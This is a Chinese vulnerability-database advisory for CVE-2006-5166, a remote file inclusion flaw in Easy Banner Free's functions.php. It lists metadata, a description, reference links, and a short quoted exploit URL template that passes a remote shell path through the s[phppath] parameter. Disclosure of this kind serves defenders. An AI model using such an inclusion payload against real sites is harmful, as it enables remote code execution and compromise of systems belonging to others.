PHP Web Scripts Easy Banner 'functions.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111182 漏洞类型 输入验证
发布时间 2006-10-02 更新时间 2006-10-06
CVE编号 CVE-2006-5166 CNNVD-ID CNNVD-200610-069
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28737
https://cxsecurity.com/issue/WLB-2006100050
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-069
|漏洞详情
PHPWebScriptsEasyBannerFree的functions.php中存在PHP远程文件包含漏洞。远程攻击者通过s[phppath]参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20295/info

Easy Banner is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Easy Banner Free is vulnerable; other versions may also be affected.

http://www.example.com/[ path ]/functions.php?s[phppath]=[shell
|参考资料

来源:XF
名称:easybannerfree-functions-file-include(29311)
链接:http://xforce.iss.net/xforce/xfdb/29311
来源:BID
名称:20295
链接:http://www.securityfocus.com/bid/20295
来源:BUGTRAQ
名称:20061001EasyBannerFree(functions.php)RemoteFileIncludeExploit
链接:http://www.securityfocus.com/archive/1/archive/1/447499/100/0/threaded
来源:SREASON
名称:1684
链接:http://securityreason.com/securityalert/1684